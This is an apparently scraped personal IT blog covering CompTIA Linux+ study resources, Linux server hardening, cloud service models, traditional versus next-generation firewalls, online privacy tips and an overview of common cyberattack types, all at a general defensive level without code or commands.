Common vulnerabilities and exposures (CVE) – Each CVE defines a specific vulnerability by which an attack may occur.
Common configuration enumeration (CCE) – A CCE is a list of system security configuration issues that can be used to develop configuration guidance.
Common platform enumeration (CPE) – CPEs are standardized methods of describing and identifying classes of applications, operating systems, and devices within your environment. CPEs are used to describe what a CVE or CCE applies to.
– Common vulnerability scoring system (CVSS) – This scoring system works to assign severity scores to each defined vulnerability and is used to prioritize remediation efforts and resources according to the threat. Scores range from 0 to 10, with 10 being the most severe.

Linux

My journey with CompTIA Linux+ exam

In this blog post I will explain the steps I took to prepare for the Linux+ exam.
I am giving myself a few months to prepare before I take the exam and pass hopefully first time.

The resources I used were:

The Official CompTIA Linux+ Self-Paced
Study Guide (Exam XK0-004) eBook

Books:

The Linux Command Line, 2nd Edition by William Shotts
How Linux Works, 3rd Edition by Brian Ward

ITProTV – video course and lab session
https://lab.redhat.com
https://linuxjourney.com

 

Server-amico

Linux server hardening

Linux server hardening is a set of measures used to reduce the attack surface and improve the security of your servers. Hardening can be done on different levels, from the physical level, by restricting the access of unauthorized people, to the application level, by removing unwanted software listening on incoming connections.

 

Use Secure Shell Protocol

Secure Shell Protocol (or SSH) enables you to make a secure connection to your network services over an unsecured network. Here are some helpful tips for implementing SSH:

-Each server should be configured to use SSH for logging in remotely. Other protocols, such as Telnet and rlogin, transfer the password in plain text, leaving a gaping hole for punk-in-the-path (previously known as man-in-the-middle) attacks.
-Configure IPTables to restrict SSH access from known IPs only.
-Use SSH version 2 because of its security enhancements over SSH version 1.
-Consider disabling SSH altogether if it’s not needed.
-Key-based authentication should be used instead of password-based authentication.
-Client keys should be encrypted to prevent their use in case they are stolen.
-While configuring the server, root login should also be disabled and only users with the appropriately configured access level should be allowed to login. Users can use sudo to perform tasks requiring elevated privileges.

 

Close Open Ports

Tools like netstat will help you check which software is listening for incoming connections. If you find an unnecessary service or server application listening for inbound connections, disable the port or remove the application.

Vulnerabilities in such applications can be exploited by attackers, hence closing down unnecessary open ports can quickly reduce the attack surface.

To take it down one step further, block the unused ports to avoid any new service binding to them.

 

Enable Firewall

Using Linux iptables to keep a tab on incoming, outgoing, and forwarded practices can help you secure your servers. You can configure “allow” and “deny” rules to accept or send traffic from specific IP addresses. This restricts the unchecked traffic movement on your servers.

However, just securing the perimeter via a firewall is not enough. In the cloud, the VMs should be configured to run in a Zero Trust network, as opposed to on-premise VMs, which are in a demilitarized zone. Any communication between VMs is considered relatively secure.

 

Disable USB and Thunderbolt Devices

Allowing booting from unauthorized external devices can allow attackers to bypass the security of your system by booting the operating system from their external device.

To preempt this kind of access, lock down booting from external USBs, CDs, and disks from BIOS. As an added step, putting password protection on BIOS will make it so that boot settings can only be changed by authorized users.

While you’re at it, enabling UEFI Secure Boot will further ensure only trusted binaries are loaded during boot.

Disabling boot from external devices can only safeguard you from unauthorized access. Users who have access to the system and a malicious intent can still copy sensitive files to their USB and thunderbolt sticks. Worse still, they can install malware, viruses, or backdoors on your servers. Once access to USB and Thunderbolt devices is disabled, a user cannot harm the system in these ways.

Finally, consider encrypting your full disk to avoid data loss in case of theft of machines or drives themselves.

 

Turn On SELinux

Security-Enhanced Linux, or SELinux for short, is a built-in access control mechanism. For systems connected to the internet and accessed by public users, disabling SELInux can be catastrophic for your servers.

SELinux operates in the following three modes:

Disabled: SELinux is completely off. You should avoid this mode at all times.
Permissive: In this mode SELinux doesn’t enforce any policy, but logs and audits all actions. This can be used while configuring the machine and installing the services to ensure all services are running, but you should switch to Enforcing as soon as configuration is done.
Enforcing: This mode is most secure and enforces all policies. This is the default mode of SELinux and is also the recommended mode.

 

Strong Password Policies

Using easy-to-crack passwords or continuing to use passwords that have been exposed in data breaches can weaken the security of even the most sophisticated systems. Here are a few password best practices:

-Disable accounts with empty passwords and ask users to set passwords for their accounts. Also disable the root account. Use of sudo should be promoted as it provides better auditing and control.
-Encourage stronger passwords and harder to guess passwords by requiring them to follow certain guidelines.

 

Purge Unnecessary Packages

Operating systems often come preloaded with software and services that run constantly in the background without notice. To enhance the security of your servers, list all packages and software installed on your servers using your package managers (apt, yum, dpkg).

Security vulnerabilities in such software can lead to compromised servers, so make it a practice to uninstall unnecessary programs.

 

Keep Kernel and Packages Updated

With such a large and active open-source community around Linux, security issues within the kernel and packages are fixed quickly. These fixes are available in the form of updated packages or patches in the Linux kernel.

Keep your kernel and packages updated with the latest security updates to avoid exploitation of known vulnerabilities.

 

Disable ICMP

Internet Control Message Protocol (ICMP) allows internet hosts to notify other hosts about errors and helps system administrators in troubleshooting. However, ICMP can also be exploited by adversaries to gain information about attacked networks.

When ICMP is enabled, malicious attacks including network discovery, covert communication channels, and network traffic redirections can be executed. Below are a few examples of types of attacks that can be unleashed when ICMP is enabled.

Ping sweep: Attackers use this to identify all hosts on a network.
Ping flood: Attackers can send ICMP messages in rapid succession, causing exhaustion of both incoming and outgoing bandwidth.
Keep in mind that completely disabling ICMP can hamper diagnostics, reliability, and network performance. Therefore, it’s best to disable only certain types of ICMP messages to secure network devices. You should still have Type 3 (Destination Unreachable) and Type 4 (Source Quench) enabled to avoid any network performance drop.

 

Logging and Auditing

Keeping detailed logging and auditing enabled for your servers is crucial. These logs can later be used to detect any attempted intrusions. Also, in case of intrusion, these logs will help you gauge the extent of the breach and offer insight for a blameless postmortem of the incident. Syslog logs all the messages in /var/log directory by default.

cloud computing polygonal wireframe technology concept background

What is cloud computing?

This term is used to describe a service in which a host (also known as a “Provider”) provides its IT infrastructure. Here you can manage all your data just like you would on your computer.  Of course you could also buy, host and maintain your own servers and data center.

Cloud computing is the on-demand delivery of IT resources over the Internet with pay-as-you-go pricing. Instead of buying, owning, and maintaining physical data centers and servers, you can access technology services, such as computing power, storage, and databases, on an as-needed basis from a cloud provider like Amazon Web Services (AWS).

What are the core elements of cloud computing?

Cloud computing can be broken down into a number of different constituent elements, focusing on different parts of the technology stack and different use cases. Let’s take a look at some of the best known in a bit more detail.

Infrastructure as a Service (IaaS) refers to the fundamental building blocks of computing that can be rented: physical or virtual servers, storage and networking. This is attractive to companies that want to build applications from the very ground up and want to control nearly all the elements themselves, but it does require firms to have the technical skills to be able to orchestrate services at that level.

Platform as a Service (PaaS) is the next layer up – as well as the underlying storage, networking, and virtual servers, this layer also includes the tools and software that developers need to build applications on top, which could include middleware, database management, operating systems, and development tools.

Software as a Service (SaaS) is the delivery of applications as a service, probably the version of cloud computing that most people are used to on a day-to-day basis. The underlying hardware and operating system is irrelevant to the end user, who will access the service via a web browser or app; it is often bought on a per-seat or per-user basis.

SaaS is the largest chunk of cloud spending simply because the variety of applications delivered via SaaS is huge, from CRM such as Salesforce, through to Microsoft’s Office 365. And while the whole market is growing at a furious rate, it’s the IaaS and PaaS segments that have consistently grown at much faster rates, according to analyst IDC: “This highlights the increasing reliance of enterprises on a cloud foundation built on cloud infrastructure, software-defined data, compute and governance solutions as a Service, and cloud-native platforms for application deployment for enterprise IT internal applications.” IDC predicts that IaaS and PaaS will continue growing at a higher rate than the overall cloud market “as resilience, flexibility, and agility guide IT platform decisions”.

While the big cloud vendors would be very happy to provide all the computing needs of their enterprise customers, increasingly businesses are looking to spread the load across a number of suppliers. All of this has lead to the rise of multi-cloud. Part of this approach is to avoid being locked in to just one vendor (which can lead to the sort of high costs and inflexibility that the cloud is often claimed to avoid), and part of it is to find the best mix of technologies across the industry.

That means being able to connect and integrate cloud services from multiple vendors is going to be a new and increasing challenge for business. Problems here include skills shortages (a lack of workers with expertise across multiple clouds) and workflow differences between cloud environments. Customers will also want to manage all their different cloud infrastructure from one place, make it easy to build applications and services and then move them, and ensure that security tools can work across multiple clouds – none of which is especially easy right now.

Data security technology background vector in blue tone

Firewall

Stateful vs. Stateless Firewalls

Stateful firewalls are capable of monitoring and detecting states of all traffic on a network to track and defend based on traffic patterns and flows. Stateless firewalls, however, only focus on individual packets, using preset rules to filter traffic.

Difference between Traditional Firewall and Next Generation Firewall

Traditional Firewall:

A traditional firewall is network security device which typically provides stateful inspection of network traffic that entering or exiting point inside network based on state, port, and protocol. So in simple traditional firewall mainly controls flow of control. It has Virtual Private Network (VPN) capabilities. But now days traditional firewalls are not so effective to offer all required protection to deal with so advanced and various types of cyber threats those are happening today.

Next Generation Firewall:

A Next Generation firewall is network security device which not only typically provides stateful inspection of network traffic that entering or exiting point inside network based on state, port, and protocol but also includes far more additional features than traditional firewall. In short Next Generation Firewall termed as only NGFW.

The additional features which are included in Next Generation Firewall are as follows –

  • Application awareness and control
  • Integrated intrusion prevention
  • Deep Packet Inspection (DPI)
  • Integrated Intrusion Protection System (IPS)
  • Cloud-delivered threat intelligence
  • Secure Sockets Layer (SSL) Inspection and Secure Shell (SSH) Control
  • Sandbox Integration
  • No impact of list of protection enabled on performance
  • Advanced Threat Protection
  • Web Filtering
  • Antivirus, Antispam, Antimalware

 

Difference between Traditional Firewall and Next Generation Firewall:

S.No. TRADITIONAL FIREWALL NEXT GENERATION FIREWALL
01. Traditional firewall mainly provides stateful inspection of incoming and outgoing network traffic that entering or exiting point inside network. Traditional firewall provides stateful inspection of incoming and outgoing network traffic that entering or exiting point inside network along with many additional features.
02. Traditional firewall is old firewall security system. Next Generation firewall is advanced firewall security system.
03. It provides partial application visibility and application control. It provides fully application visibility and application control.
04. Traditional Firewall works on layer 2 to Layer 4. Next Generation Firewall works on layer 2 to Layer 7.
05. It does not support application level awareness. It supports application level awareness.
06. Reputation and identity services are not supported in it. Reputation and identity services are supported in it.
07. In traditional firewall separately managing security tools is expensive. In next generation firewall it is easy to install and configure integrated security tools and reduces administrative cost.
08. It does not provide complete package of security technologies. It provides complete package of security technologies.
09. Traditional firewall can not decrypt and inspect SSL traffic. Next Generation Firewall can decrypt and inspect SSL traffic in both in and out direction.
10. It supports Network Address Translation(NAT), Port Address Translation (PAT) and Virtual Private Network (VPN). It extends the functionality of Network Address Translation(NAT), Port Address Translation (PAT) and Virtual Private Network (VPN) and makes integration of new threat management technology like sandboxing.
11. Integrated Intrusion Protection System (IPS) and Intrusion Detection System (IDS) are deployed separately. Integrated Intrusion Protection System (IPS) and Intrusion Detection System (IDS) are fully integrated with it.

 

Futuristic lock shield protection vector

How to protect yourself privacy online

Limit the personal information you share on social media

A smart way to help protect your privacy online? Don’t overshare on social media. Providing too much information on Facebook, Twitter, and Instagram could make it easier for cybercriminals to obtain identifying information, which could allow them to steal your identity or to access your financial information.

For example, could an identity thief determine your high school mascot or your mother’s maiden name from digging through your Facebook account? This information is sometimes used as security questions to change passwords on financial accounts.

To protect your online privacy, ignore the “About Me” fields in your social media profiles. You don’t have to let people know what year or where you were born — which could make you an easier target for identity theft.

Explore different privacy settings, too. You might want to limit the people who can view your posts to those you’ve personally invited.

Create strong passwords, too, for your social media profiles to help prevent others from logging into them in your name. This means using a combination of at least 12 numbers, special characters, and upper- and lower-case letters.

Browse in private mode

If you don’t want your computer to save your browsing history, temporary internet files, or cookies, do your web surfing in private mode.

Web browsers offer their own versions of this form of privacy protection. In Chrome, it’s called Incognito Mode. Firefox calls its setting Private Browsing, and Internet Explorer uses the name InPrivate Browsing for its privacy feature. When you search with these modes turned on, others won’t be able to trace your browsing history from your computer.

But these private modes aren’t completely private. When you’re searching in incognito or private mode, your Internet Service Provider (ISP) can still see your browsing activity. If you are searching on a company computer, so can your employer. The websites you visit can also track you.

So, yes, incognito browsing does have certain benefits. But it’s far from the only tool available to help you maintain your privacy while online.

Use a different search engine

If you’re like many web surfers, you rely heavily on Google as your search engine. But you don’t have to. Privacy is one reason people prefer to use anonymous search engines.

This type of search engine doesn’t collect or share your search history or clicks. Anonymous search engines can also block ad trackers on the websites you visit.

Use a virtual private network

A virtual private network (VPN) gives you online privacy and anonymity by creating a private network from a public internet connection. VPNs mask your Internet Protocol (IP) address so your online actions are virtually untraceable.

Using a VPN is especially important when you’re on public Wi-Fi at a library, coffee shop, or other public location. A VPN will make it more difficult for cybercriminals to breach your online privacy and access your personal information.

Be careful where you click

One of the ways in which hackers compromise your online privacy is through phishing attempts. In phishing, scammers try to trick you into providing valuable financial or personal information. They’ll often do this by sending fake emails that appear to be from banks, credit card providers, or other financial institutions. Often, these emails will say that you must click on a link and verify your financial information to keep your account from being frozen or closed.

Don’t fall for these scams. If you click on a phishing link, you could be taken to a spoofed webpage that looks like the homepage of a bank or financial institution. But when you enter in your account information, you’ll be sending it to the scammers behind the phishing attempt.

Before clicking on suspicious links, hover your cursor over the link to view the destination URL. If it doesn’t match the financial website you use, don’t click.

Secure your mobile devices

Many of us spend more time surfing the web, answering emails, and watching videos on our smartphones than we do on our laptops. It’s important, then, to put as much effort into protecting our online privacy on our phones and tablets as on our computers.

To start, make sure to use a passcode to lock your phone. It might seem like a hassle to enter a code every time you want to access your phone’s home screen. But this passcode could offer an extra layer of protection if your phone is lost or stolen. Make sure your passcode is complex. Don’t use your birthdate, your house number, or any other code that thieves might be able to guess.

Use caution when downloading apps. These games and productivity tools could come embedded with dangerous viruses. Only buy games from legitimate sources.

Use the same caution, too, when searching the web or reading emails on your mobile devices as you do when using your laptop or desktop computer.

Don’t ignore software updates, either. These updates often include important protections against the latest viruses.

Use quality antivirus software

Finally, always install antivirus software on all your devices. This software can keep hackers from remotely taking over your computer, accessing your personal and financial information, and tracking your location.

Manufacturers frequently update their virus protection software as a defense against the latest malware, spyware, and other viruses. Install updates as soon as they become available or set up automatic updates on all your devices.

CS - new

What is cyber security?

Cyber security is how individuals and organisations reduce the risk of cyber attack.
Cyber security’s core function is to protect the devices we all use (smartphones, laptops, tablets and computers), and the services we access – both online and at work – from theft or damage.It’s also about preventing unauthorised access to the vast amounts of personal information we store on these devices, and online.

Common Types of cyber security Attacks

Malware
The term “malware” encompasses various types of attacks including spyware, viruses, and worms. Malware uses a vulnerability to breach a network when a user clicks a “planted” dangerous link or email attachment, which is used to install malicious software inside the system.

Malware and malicious files inside a computer system can:
– Deny access to the critical components of the network
– Obtain information by retrieving data from the hard drive
– Disrupt the system or even render it inoperable

Malware is so common that there is a large variety. The most common types being:

Viruses – these infect applications attaching themselves to the initialization sequence. The virus replicates itself, infecting other code in the computer system. Viruses can also attach themselves to executable code or associate themselves with a file by creating a virus file with the same name but with an .exe extension, thus creating a decoy which carries the virus.
Trojans – a program hiding inside a useful program with malicious purposes. Unlike viruses, a trojan doesn’t replicate itself and it is commonly used to establish a backdoor to be exploited by attackers.
Worms – unlike viruses, they don’t attack the host, being self-contained programs that propagate across networks and computers. Worms are often installed through email attachments, sending a copy of themselves to every contact in the infected computer email list. They are commonly used to overload an email server and achieve a denial-of-service attack.
Ransomware
– a type of malware that denies access to the victim data, threatening to publish or delete it unless a ransom is paid. Advanced ransomware uses cryptoviral extortion, encrypting the victim’s data so that it is impossible to decrypt without the decryption key.
Spyware – a type of program installed to collect information about users, their systems or browsing habits, sending the data to a remote user. The attacker can then use the information for blackmailing purposes or download and install other malicious programs from the web.

Phishing
Phishing attacks are extremely common and involve sending mass amounts of fraudulent emails to unsuspecting users, disguised as coming from a reliable source. The fraudulent emails often have the appearance of being legitimate, but link the recipient to a malicious file or script designed to grant attackers access to your device to control it or gather recon, install malicious scripts/files, or to extract data such as user information, financial info, and more.

Phishing attacks can also take place via social networks and other online communities, via direct messages from other users with a hidden intent. Phishers often leverage social engineering and other public information sources to collect info about your work, interests, and activities—giving attackers an edge in convincing you they’re not who they say.

There are several different types of phishing attacks, including:
Spear Phishing – targeted attacks directed at specific companies and/or individuals.
Whaling – attacks targeting senior executives and stakeholders within an organization.
Pharming – leverages DNS cache poisoning to capture user credentials through a fake login landing page.

Phishing attacks can also take place via phone call (voice phishing) and via text message (SMS phishing). This post highlights additional details about phishing attacks—how to spot them and how to prevent them.

Man-in-the-Middle (MitM) Attacks
Occurs when an attacker intercepts a two-party transaction, inserting themselves in the middle. From there, cyber attackers can steal and manipulate data by interrupting traffic.

This type of attack usually exploits security vulnerabilities in a network, such as an unsecured public WiFi, to insert themselves between a visitor’s device and the network. The problem with this kind of attack is that it is very difficult to detect, as the victim thinks the information is going to a legitimate destination. Phishing or malware attacks are often leveraged to carry out a MitM attack.

Denial-of-Service (DOS) Attack
DoS attacks work by flooding systems, servers, and/or networks with traffic to overload resources and bandwidth. The result is rendering the system unable to process and fulfill legitimate requests. In addition to denial-of-service (DoS) attacks, there are also distributed denial-of-service (DDoS) attacks.

DoS attacks saturate a system’s resources with the goal of impeding response to service requests. On the other hand, a DDoS attack is launched from several infected host machines with the goal of achieving service denial and taking a system offline, thus paving the way for another attack to enter the network/environment.

The most common types of DoS and DDoS attacks are the TCP SYN flood attack, teardrop attack, smurf attack, ping-of-death attack, and botnets.

SQL Injections
This occurs when an attacker inserts malicious code into a server using server query language (SQL) forcing the server to deliver protected information. This type of attack usually involves submitting malicious code into an unprotected website comment or search box. Secure coding practices such as using prepared statements with parameterized queries is an effective way to prevent SQL injections.

When a SQL command uses a parameter instead of inserting the values directly, it can allow the backend to run malicious queries. Moreover, the SQL interpreter uses the parameter only as data, without executing it as a code. Learn more about how secure coding practices can prevent SQL injection.

Zero-day Exploit
A Zero-day Exploit refers to exploiting a network vulnerability when it is new and recently announced before a patch is released and/or implemented. Zero-day attackers jump at the disclosed vulnerability in the small window of time where no solution/preventative measures exist. Thus, preventing zero-day attacks requires constant monitoring, proactive detection, and agile threat management practices.

Password Attack
Passwords are the most widespread method of authenticating access to a secure information system, making them an attractive target for cyber attackers. By accessing a person’s password, an attacker can gain entry to confidential or critical data and systems, including the ability to manipulate and control said data/systems.

Password attackers use a myriad of methods to identify an individual password, including using social engineering, gaining access to a password database, testing the network connection to obtain unencrypted passwords, or simply by guessing.

The last method mentioned is executed in a systematic manner known as a “brute-force attack.” A brute-force attack employs a program to try all the possible variants and combinations of information to guess the password.

Another common method is the dictionary attack, when the attacker uses a list of common passwords to attempt to gain access to a user’s computer and network. Account lockout best practices and two-factor authentication are very useful at preventing a password attack. Account lockout features can freeze the account out after a number of invalid password attempts and two-factor authentication adds an additional layer of security, requiring the user logging in to enter a secondary code only available on their 2FA device(s).

Cross-site Scripting
A cross-site scripting attack sends malicious scripts into content from reliable websites. The malicious code joins the dynamic content that is sent to the victim’s browser. Usually, this malicious code consists of Javascript code executed by the victim’s browser, but can include Flash, HTML, and XSS.